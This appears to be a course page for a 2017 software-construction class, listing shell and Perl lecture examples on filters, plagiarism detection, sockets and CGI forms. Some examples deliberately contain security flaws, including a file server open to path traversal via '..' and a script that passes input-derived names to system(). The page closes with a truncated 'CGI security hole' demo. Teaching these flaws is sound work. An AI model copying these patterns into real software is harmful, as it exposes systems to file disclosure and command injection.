COMP[29]041 17s2 COMP[29]041 Software Construction Software Construction

COMP[29]041 Course Resources

Course OutlineLecture recordingsCourse ForumCourse Timetable  Home computing: vlab  Handbook COMP2041 COMP9041
Exam Information    Assignment 1 (draft automarking) Assignment 2 (Evan's Port Forwarding Tutorial Flask Tutorial)

COMP[29]041 Week-by-Week

Week 1

Wednesday Jul 26 lecture topics:IntroFilters

Friday Jul 28 lecture topics:Filters

Week 2  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions

Wednesday Aug 02 lecture topics:FiltersShell

Friday Aug 04 lecture topics:Shell


A simple shell script demonstrating access to arguments.

echo My name is $0
echo My process number is $$
echo I have $# arguments
echo My arguments separately are $*
echo My arguments together are "$@"
echo My 5th argument is "'$5'"

l [file|directories...] - list files

Short Shell scripts can be used for convenience.

Note: "$@" like $* expands to the arguments to the script, but preserves the integrity of each argument if it contains spaces.

ls -las "$@"

Count the number of time each different word occurs in the files given as arguments, e.g. word_frequency.sh dracula.txt

sed 's/ /\n/g' "$@"|      # convert to one word per line
tr A-Z a-z|               # map uppercase to lower case
sed "s/[^a-z']//g"|       # remove all characters except a-z and '
egrep -v '^$'|            # remove empty lines
sort|                     # place words in alphabetical order
uniq -c|                  # use uniq to count how many times each word occurs
sort -n                   # order words in frequency of occurrance

Change the names of the specified files to lower case.

Note the use of test to check if the new filename differs from the old.

The perl utility rename provides a more general alternative.

Note without the double quotes below filenames containing spaces would be handled incorrectly.

Note also the use of -- to avoid mv interpreting a filename being with - as an option

Although a files named -n or -e will break the script because echo will treat them as an option,

if test $# = 0
then
    echo "Usage $0: <files>" 1>&2
    exit 1
fi

for filename in "$@"
do
    new_filename=`echo "$filename" | tr A-Z a-z`
    test "$filename" = "$new_filename" && continue
    if test -r "$new_filename"
    then
        echo "$0: $new_filename exists" 1>&2
    elif test -e "$filename"
    then
        mv -- "$filename" "$new_filename"
    else
        echo "$0: $filename not found" 1>&2
    fi
done

Week 3  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions

Wednesday Aug 09 lecture topics:Shell

Friday Aug 11 lecture topics:Shell


Repeatedly download a specified web page until a specified regexp matches its source then notify the specified email address.

For example:

repeat_seconds=300  #check every 5 minutes

if test $# = 3
then
    url=$1
    regexp=$2
    email_address=$3
else
    echo "Usage: $0 <url> <regex>" 1>&2
    exit 1
fi

while true
do
    if wget -O- -q "$url"|egrep "$regexp" >/dev/null
    then
        echo "Generated by $0" | mail -s "$url now matches $regexp" $email_address
        exit 0
    fi
    sleep $repeat_seconds
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

if test $# = 1
then
    start=1
    finish=$1
elif test $# = 2
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while test $number -le $finish
do
    echo $number
    number=`expr $number + 1`    # or number=$(($number + 1))
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

if (($# == 1))
then
    start=1
    finish=$1
elif (($# == 2))
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while ((number <= finish))
do
    echo $number
    number=$((number + 1))
done

Run as plagiarism_detection.simple_diff.sh <files>

Report if any of the files are copies of each other

The use of diff -iw means changes in white-space or case won't affect comparisons

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break
        if diff -i -w "$file1" "$file2" >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done

Improved version of plagiarism_detection.simple_diff.sh

The substitution s/\/\/.*// removes // style C comments.

This means changes in comments won't affect comparisons.

Note use of temporary files

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$


for file1 in "$@"
do
    for file2 in "$@"
    do
        if test "$file1" = "$file2"
        then
            break # avoid comparing pairs of assignments twice
        fi
        sed 's/\/\/.*//' "$file1" >$TMP_FILE1
        sed 's/\/\/.*//' "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.comments.sh

This version converts C strings to the letter 's' and it converts identifiers to the letter 'v'.

Hence changes in strings & identifiers won't prevent detection of plagiarism.

The substitution s/"["]*"/s/g changes strings to the letter 's'

This pattern won't match a few C strings which is fine for our purposes

The s/[a-zA-Z_][a-zA-Z0-9_]*/v/g changes all variable names to 'v' which means changes to variable names won't affect comparison.

Note this also may change function names, keywords etc.

This is fine for our purposes.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1" >$TMP_FILE1
        sed "$substitutions" "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Week 4  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions

Wednesday Aug 16 lecture topics:ShellPerl Intro

Friday Aug 18 lecture topics:Perl IntroPerl Arrays


Improved version of plagiarism_detection.identifiers.sh

Note the use of sort so line reordering won't prevent detection of plagiarism.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1"|sort >$TMP_FILE1
        sed "$substitutions" "$file2"|sort >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.reordering.sh

Note use md5sum to calculate a Cryptographic hash of the modified file http://en.wikipedia.org/wiki/MD5 and then use sort && uniq to find files with the same hash

This allows execution time linear in the number of files

substitutions='s/\/\/.*//;s/"[^"]"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file in "$@"
do
    echo `sed "$substitutions" "$file"|sort|md5sum` $file
done|
sort|
uniq -w32 -d --all-repeated=separate|
cut -c36-

compute Pythagoras' Theorem

print "Enter x: ";
$x = <STDIN>;
chomp $x;
print "Enter y: ";
$y = <STDIN>;
chomp $y;
$pythagoras = sqrt $x * $x + $y * $y;
print "The square root of $x squared + $y squared is $pythagoras\n";

Read numbers until end of input (or a non-number) is reached then print the sum of the numbers

$sum = 0;
while ($line = <STDIN>) {
    $line =~ s/^\s*//; # remove leading white space
    $line =~ s/\s*$//; # remove leading trailing white space
    # Test if string looks like an integer or real (scientific notation not handled!)
    if ($line !~ /^\d[.\d]*$/) {
        last;
    }
    $sum += $line;
}
print "Sum of the numbers is $sum\n";

Simple example reading a line of input and examining characters

printf "Enter some input: ";
$line = <STDIN>;
if (!defined $line) {
	die "$0: could not read any characters\n";
}
chomp $line;
$n_chars = length $line;
print "That line contained $n_chars characters\n";
if ($n_chars > 0) {
	$first_char = substr($line, 0, 1);
	$last_char = substr($line, $n_chars - 1, 1);
	print "The first character was '$first_char'\n";
	print "The last character was '$last_char'\n";
}

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

print "Enter line: ";
$last_line = <STDIN>;
print "Enter line: ";
while ($line = <STDIN>) {
	if ($line eq $last_line) {
		print "Snap!\n";
	}
    $last_line = $line;
	print "Enter line: ";
}

create a string of size 2^n by concatenation

die "Usage: $0 <n>\n" if @ARGV != 1;
$n = 0;
$string = '@';
while ($n  < $ARGV[0]) {
    $string = "$string$string";
    $n++;
}
printf "String of 2^%d = %d characters created\n", $n, length $string;

Perl implementation of /bin/echo always writes a trailing space

foreach $arg (@ARGV) {
    print $arg, " ";
}
print "\n";

Perl implementation of /bin/echo

print "@ARGV\n";

Perl implementation of /bin/echo

print join(" ", @ARGV), "\n";

Simple example reading a line of input and examining characters

printf "Enter some input: ";
$line = <STDIN>;
if (!defined $line) {
	die "$0: could not read any characters\n";
}
chomp $line;
$n_chars = length $line;
print "That line contained $n_chars characters\n";
if ($n_chars > 0) {
	$first_char = substr($line, 0, 1);
	$last_char = substr($line, $n_chars - 1, 1);
	print "The first character was '$first_char'\n";
	print "The last character was '$last_char'\n";
}

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

print "Enter line: ";
$last_line = <STDIN>;
print "Enter line: ";
while ($line = <STDIN>) {
	if ($line eq $last_line) {
		print "Snap!\n";
	}
    $last_line = $line;
	print "Enter line: ";
}

create a string of size 2^n by concatenation

die "Usage: $0 <n>\n" if @ARGV != 1;
$n = 0;
$string = '@';
while ($n  < $ARGV[0]) {
    $string = "$string$string";
    $n++;
}
printf "String of 2^%d = %d characters created\n", $n, length $string;

Perl implementation of /bin/echo always writes a trailing space

foreach $arg (@ARGV) {
    print $arg, " ";
}
print "\n";

Perl implementation of /bin/echo

print "@ARGV\n";

Perl implementation of /bin/echo

print join(" ", @ARGV), "\n";

while (1) {
    print "Enter array index: ";
    $n = <STDIN>;
    if (!$n) {
        last;
    }
    chomp $n;
    $a[$n] = 42;
    print "Array element $n now contains $a[$n]\n";
    printf "Array size is now %d\n", $#a+1;
}

sum integers supplied as command line arguments no check that aguments are numeric

$sum = 0;
foreach $arg (@ARGV) {
	$sum += $arg;
}
print "Sum of the numbers is $sum\n";

Count the number of lines on standard input.

$line_count = 0;
while (1) {
    $line = <STDIN>;
    last if !$line;
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input - slightly more concise

$line_count = 0;
while (<STDIN>) {
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input. read the input into an array and use the array size.

@lines = <STDIN>;
print $#lines+1, " lines\n";

Print lines read from stdin in reverse order.

In a C-style

while ($line = <STDIN>) {
    $line[$line_number++] = $line;
}


for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context

@line = <STDIN>;
for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context & reverse

@lines = <STDIN>;
print reverse @lines;


Simple cp implementation using line by line I/O

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
open my $out, '>', $outfile or die "Cannot open $outfile: $!";

while ($line = <$in>) {
    print $out $line;
}

close $in;
close $out;
exit 0;

Simple cp implementation reading entire file into array note that <> returns an array of lines in a list context (in a scalar context it returns a single line)

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
@lines = <$in>;
close $in;

open my $out, '>', $outfile or die "Cannot open $outfile: $!";
print $out @lines;
close $out;

exit 0;

Week 5  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Aug 23 lecture topics:Perl ArraysPerl Regex

Friday Aug 25 lecture topics:Perl Regex


Reads lines of input until end-of-input

Print snap! if a line has been seen previously

while (1) {
	print "Enter line: ";
	$line = <STDIN>;
	if (!defined $line) {
		last;
	}
	if ($seen{$line}) {
		print "Snap!\n";
	}
	$seen{$line}++;
}

run as ./expel_student mark_deductions.txt find the student with the largest mark deductions expell them

while ($line = <>) {
    chomp $line;
    $line =~ s/^"//;
    $line =~ s/"$//;
    my ($name,$offence,$date,$penalty);
    ($name,$offence,$date,$penalty) = split /"\s*,\s*"/, $line;
    $penalty =~ s/[^0-9]//g;
    $deduction{$name} += $penalty;
}

$worst = 0;
foreach $student (keys %deduction) {
    $penalty = $deduction{$student};
    if ($penalty > $worst) {
        $worst_student = $student;
        $worst = $penalty;
    }
}
print "Expel $worst_student who had $worst marks deducted\n";

Fetch a web page removing HTML tags and constants (e.g &amp;)

Lines between script or style tags are skipped.

Non-blank lines are printed

There are better ways to fetch web pages (e.g. HTTP::Request::Common)

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

foreach $url (@ARGV) {
    open my $f, '-|', "wget -q -O- '$url'" or die;
    while ($line = <$f>) {
        if ($line =~ /^\s*<(script|style)/i) {
            while ($line = <$f>) {
                last if $line =~ /^\s*<\/(script|style)/i;
            }
        } else {
            $line =~ s/&\w+;/ /g;
            $line =~ s/<[^>]*>//g;
            print $line if $line =~ /\S/;
        }
    }
    close $f;
}

Week 6  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday Aug 30 lecture topics:Perl Regex

Friday Sep 1 lecture topics:Perl Functions


For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in a new file which is then renamed to replace the old file

foreach $filename (@ARGV) {
    $tmp_filename = "$filename.new";
    die "$0: $tmp_filename already exists" if -e "$tmp_filename";
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    open my $g, '>', $tmp_filename or die "$0: Can not open $tmp_filename : $!";
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        print $g $line;
    }
    close $f;
    close $g;
    rename "$tmp_filename", $filename or die "$0: Can not rename file";
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in an array then the file is over-written

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    $line_count = 0;
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        $new_lines[$line_count++] = $line;
    }
    close $f;
    open my $g, '>', ">$filename" or die "$0: Can not open $filename : $!";
    print $g @new_lines;
    close $g;
}

Print the last number (real or integer) on every line if there is one.

Note regexp to match number: -?\d+(\.\d+)?

while ($line = <>) {
	if ($line =~ /(-?\d+(\.\d+)?)\D*$/) {
		print "$1\n";
	}
}

run as course_first_names.pl enrollments report cases where there are multiple people same first name enrolled in acourse

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}



run as course_first_names.pl enrollments report cases where there are multiple people same first name enrolled in acourse

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}



This shows a bug due to a missing my declaration

In this case the use of $i in is_prime without a my declarations changes $i outside the function and breaks the while loop calling the function

sub is_prime {
	my ($n) = @_;
	$i = 2;
	while ($i < $n) {
		return 0 if $n % $i == 0;
	}
	return 1;
}

$i = 0;
while ($i < 1000) {
	print "$i\n" if is_prime($i);
}
		

3 different ways to sum a list - illustrating various aspects of Perl

simple for loop

sub sum_list0 {
    my (@list) = @_;
    my $total = 0;
    foreach $element (@list) {
       $total += $element;
    }
    return $total;
}

# recursive
sub sum_list1 {
    my (@list) = @_;
    return 0 if !@list;
    return $list[0] + sum_list1(@list[1..$#list]);
}

# join+eval - interesting but not recommended
sub sum_list2 {
    my (@list) = @_;
    return eval(join("+", @list))
}

print sum_list0(1..10), " ", sum_list1(1..10), " ", sum_list2(1..10),  "\n";

8 different ways to print the odd numbers in a list - illustrating various aspects of Perl

simple for loop

sub print_odd0 {
    my (@list) = @_;
    foreach $element (@list) {
        print "$element\n" if $element % 2;
    }
}

# simple for loop using index
sub print_odd1 {
    my (@list) = @_;
    foreach $i (0..$#list) {
        print "$list[$i]\n" if $list[$i] % 2;
    }
}

# set $_ in turn to each item in list
# evaluate supplied expression
# print item if the expression evaluates to true
sub print_list0 {
    my ($select_expression, @list) = @_;
    foreach $_ (@list) {
        print "$_\n" if &$select_expression;
    }
}

# calling helper function which prints
# items selected by an expression
sub print_odd2 {
    print_list0(sub {$_ % 2}, @_);
}

sub odd {
    return $_[0] % 2;
}

# more concise version of print_list0
sub print_list1 {
   &{$_[0]} && print "$_\n" foreach @_[1..$#_];
}

# calling helper function which prints
# items selected by an expression
sub print_odd3 {
    print_list1(sub {odd $_}, @_);
}

# set $_ in turn to each item in list
# evaluate supplied expression
# return a list of items for which the expression evaluated to true
sub my_grep0 {
    my $select_expression = $_[0];
    my @matching_elements;
    foreach $_ (@_[1..$#_]) {
        push @matching_elements, $_ if &$select_expression;
    }
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd4 {
    foreach $x (my_grep0 sub {$_ % 2}, @_) {
        print "$x\n";
    }
}


# more concise version of my_grep0
sub my_grep1 {
    my $select_expression = shift;
    my @matching_elements;
    &$select_expression && push @matching_elements, $_ foreach @_;
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd5 {
    my_grep1 sub {odd $_ && print "$_\n"}, @_;
}

# using built-in grep and combining print
sub print_odd6 {
    grep {$_ % 2 && print "$_\n"} @_;
}

# using built-in grep and join
sub print_odd7 {
    print join("\n", grep {$_ % 2} @_), "\n";
}


@a = (1..10);
foreach $version (0..7) {
    print "print_odd$version\n";
    &{"print_odd$version"}(@a);
}

Week 7  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Week 8  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Week 9  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday sep 20 lecture topics:Web

Friday sep 22 lecture topics:CGI


simple Perl TCP/IP server access by telnet localhost 4242

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 4242, Listen => SOMAXCONN) or die;

while ($c = $server->accept()) {
    printf STDERR "[Connection from %s]\n", $c->peerhost;
    print $c scalar localtime,"\n";
    close $c;
}

simple Perl TCP/IP client

use IO::Socket;
$server_host =  $ARGV[0] || 'localhost';
$server_port = 4242;
$c = IO::Socket::INET->new(PeerAddr => $server_host, PeerPort  => $server_port) or die;
$time = <$c>;
close $c;
print "Time is $time\n";

fetch files via http from the webserver at the specified URL see HTTP::Request::Common for a more general solution

use IO::Socket;
foreach $url (@ARGV) {
    $url =~ /http:\/\/([^\/]+)(:(\d+))?(.*)/ or die;
    $c = IO::Socket::INET->new(PeerAddr => $1, PeerPort => $2 || 80) or die;
    # send request for web page to server
    print $c "GET $4 HTTP/1.0\n\n";
    # read what the server returns
    my @webpage = <$c>;
    close $c;
    print "GET $url =>\n", @webpage, "\n";
}

list to port 2041 for incoming connections print then details to stdout then send back a 404 status code

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this server at http://localhost:2041/\n\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    print $c "HTTP/1.0 404 This webserver always returns a 404 status code\n";
    close $c;
}

list to port 2041 for incoming connections print then details to stdout then send back a 404 status code

use IO::Socket;
$server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;

print "Access this web server at http://localhost:2041/\n\n";

$content = "Everything is OK - you will pass COMP[29]041.\n";

while ($c = $server->accept()) {
    printf "HTTP request from %s =>\n\n", $c->peerhost;
    while ($request_line = <$c>) {
        print "$request_line";
        last if $request_line !~ /\S/;
    }
    
    # print header
    print $c "HTTP/1.0 200 OK\n";
    print $c "Content-Type: text/plain\n";
    printf $c "Content-Length: %d\n\n", length($content);

    print $c $content;
    close $c;
}

return files in response to incoming http requests to port 2041 note does not check the request is well-formed or that the file exists also very insecure as pathname may contain ..

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        my $request = <$c>;
        print "Connection from ", $c->peerhost, ": $request";
        $request =~ /^GET (.+) HTTP\/1.[01]\s*$/;
        print "Sending back /home/cs2041/public_html/$1\n";
        open my $f, '<',"/home/cs2041/public_html/$1";
        $content = join "", <$f>;
        close $f;
        print $c "HTTP/1.0 200 OK\n";
        print $c "Content-Type: text/html\n";
        printf $c "Content-Length: %d\n\n", length($content);
        print $c $content;
        close $c;
    }
}

return files in response to incoming http requests to port 2041, determine appropriate mime type using /etc/mime.types

use IO::Socket;

print "Access this server at http://localhost:2041/\n\n";

open my $mt, '<', "/etc/mime.types" or die "Can not open /etc/mime.types: $!\n";
while ($line = <$mt>) {
    $line =~ s/#.*//;
    my ($mime_type, @extensions) = split /\s+/, $line;
    foreach $extension (@extensions) {
        $mime_type{$extension} = $mime_type;
    }
}
close $mt;
while (1) {
    $server = IO::Socket::INET->new(LocalPort => 2041, ReuseAddr => 1, Listen => SOMAXCONN) or die;
    while ($c = $server->accept()) {
        print "waiting for connection";
        my $request = <$c>;
        last if !$request;
        printf "Connection from %s, request: $request", $c->peerhost;
        my $content_type = "text/plain";
        my $status_line = "400 BAD REQUEST";
        my $content = "";

        if (my ($url) = $request =~ /^GET (.+) HTTP\/1.[01]\s*$/) {
            # remove any occurences of .. from pathname to prevent access outside 2041 directory
            $url =~ s/(^|\/)\.\.(\/|$)//g;
            my $file = "/home/cs2041/public_html/$url";
            $file .= "/index.html" if -d $file;

            print "$file requested\n";
            if (open my $f, '<', $file) {
                my ($extension) = $file =~ /\.(\w+)$/;
                $status_line = "200 OK";
                $content_type = $mime_type{$extension} if $extension && $mime_type{$extension};
                $content = join "", <$f>;
            } else {
                $status_line = "404 FILE NOT FOUND";
                $content = "File $file not found\n";
            }
        }

        my $header = sprintf "HTTP/1.0 $status_line\nContent-Type: $content_type\nContent-Length: %d\n\n", length($content);
        print "Sending this header:\n", $header;

        print $c $header, $content;;
        close $c;
    }
}

Output some simple HTML

echo 'Content-type: text/html

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Hello World</title>
  </head>
  <body>
    Hello World
  </body>
</html>'

Output some simple HTML

use CGI qw/:all/;

print header,
      start_html('Hello World'),
      h2('Hello World'),
      end_html;

Print some HTML plus information about the environment in which the CGI script has been run

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Execution Environment</h2>
<pre>
eof

for command in pwd id hostname 'uname -a'
do
    echo "$command: `$command`"
done

cat <<eof
</pre>
</body>
</html>
eof


Print some HTML plus the environment passed to CGI script by the web server

Note a < character in environment variable values will be interpreted as a HTML tag

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<h2>Environment Variables</h2>
<pre>
`env`
</pre>
</body>
</html>
eof


Pick a random image from a directory overlay the image with the filename using ImageMagick

$directory = "./images";
foreach $file (glob "$directory/*.jpg") {
    next if !-r $file;
    push @files, $file;
}

$random_file = $files[rand @files];
$name = $random_file;
$name =~ s/.jpg$//;
$name =~ s/.*\///;
$name =~ s/[\-_]/ /g;
$name =~ s/[^\w\s]//g;
$convert_options = "-gravity south -pointsize 72 -stroke '#0004' -strokewidth 2 -annotate 0 '$name' -stroke none -fill white -annotate 0 '$name'";
print "Content-type: image/jpeg\n\n";
system "convert '$random_file' $convert_options -"

Week 10  Tutorial: Questions & Sample Answers  Laboratory: Exercises & Sample Solutions  Weekly Test: Questions & Sample Solutions

Wednesday oct 04 lecture topics:CGI

Friday oct 06 lecture topics:CGI


Outputs a form which will rerun the script

cat <<eof
Content-type: text/html

<html><head>Self replicating Form</head><body>
<form method="post" action="">
<input type="submit">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Parameter');
warningsToBrowser(1);

print <<eof;
<form method="post" action="">
Enter a string: <input type="text" name="string">
</form>
<p>
eof

if (param("string")) {
    print "Last time you entered: ";
    print param("string");
}
print end_html;

Sum two numbers and outputs a form which will rerun the script

Note removal of characters other than 0-9 . - + to avoid potential security problems

if test $REQUEST_METHOD = "GET"
then
    parameters="$QUERY_STRING"
else
    read parameters
fi

x=`echo $parameters|sed '
    s/.*x=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`
y=`echo $parameters|sed '
    s/.*y=//
    s/&.*//
    s/[^0-9\-\.\+]//g
    '`

cat <<eof
Content-type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Sum Two Numbers</title>
</head>
<body>
eof

sum="?"
test "$x" -a "$y" && sum=`expr "$x" '+' "$y"`

cat <<eof

<form method="GET" action="">
<input type=textfield name=x value=$x>
+
<input type=textfield name=y value=$y>
=
$sum
<input type="submit" value="calculate">
</form>
</body>
</html>
eof


Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Using A Hidden Variable');
warningsToBrowser(1);

if (defined param('x')) {
    $x = param("x") + 1;
} else {
    $x = 0;
}

printf "2**%d = %d\n", $x, 2 ** $x;

print <<eof;
<form method="post" action="">
<input type=hidden name="x" value="$x">
<input type="submit" value="Next Power of 2">
</form>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

Two submit buttons are used to produce different actions

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Handling Multiple Submit Buttons</title>
</head>
<body>
eof
warningsToBrowser(1);

$hidden_variable = param("x") || 0;

if (defined param("increment")) {
	$hidden_variable++;
} elsif (defined param("decrement")) {
	$hidden_variable--;
}

print <<eof;
<h2>$hidden_variable</h2>
<form method="post" action="">
<input type=hidden name="x" value="$hidden_variable">
<input type="submit" name="increment" value="Increment">
<input type="submit" name="decrement" value="Decrement">
</form>
</body>
</html>
eof

Outputs a form which will rerun the script

An input field of type hidden is used to pass an integer to successive invocations

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Alternating State');
warningsToBrowser(1);

$x = param('state') || 0;
$x++;
param("state", $x);

print start_form, "\n";

if ($x % 2 == 0) {
    print "What's your name?\n", textfield('name');
} else {
    print "What's your height?\n", textfield('height');
}

print hidden('state'), "\n";
print end_form, "\n";
print end_html, "\n";

Count words in a file.

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print <<eof;
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>Word Count</title>
</head>
<body>
eof

my $uploaded_file = param('filename');
if (defined $uploaded_file) {
    my ($lines, $words, $bytes);
    while ($line = <$uploaded_file>) {
        my @words = split /\s+/, $line;
        $words += @words;
        $bytes += length $line;
        $lines++;
    }
    printf "$uploaded_file: %d lines %d words %d bytes\n", $lines, $words, $bytes;
} 

print <<eof;
<form method="post" action="" enctype="multipart/form-data">
<input type="file" name="filename" value="Bitter.html">
<input type="submit" name="upload" value="Word Count File">
</form>
</body>
</html>
eof

Allow users to change a file

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Editing A File');
warningsToBrowser(1);

$filename = "editfile.data";
$file_content = param('content');

if (param('Save') && defined $file_content) {
    if (open FILE, '>', $filename) {
    	print FILE $file_content;
    	close FILE;
    	print "File saved\n", end_html;
    } else {
    	print "Save failed\n", end_html;
    }
    exit 0;
}

if (!defined $file_content && open F, '<', $filename) {
	$file_content = join "", <F>;
	param('content', $file_content);
}

print   start_form, "\n",
        textarea(-name=>'content', -rows=>10,-cols=>60), "\n",
        p, submit('Save'), "\n",
        end_form, "\n",
        end_html;

Create a pop menu with one entry for every file with the suffix .cgi in the current directory

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('Choosing A File');
warningsToBrowser(1);

@cgi_files = glob("*.cgi");
$default = $cgi_files[rand @cgi_files]; # pick an element at random

print start_form, "\n",
    popup_menu('CGI files', \@cgi_files,  $default), "\n",
    end_form, "\n",
    end_html;

to demonstrate a CGI security hole

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

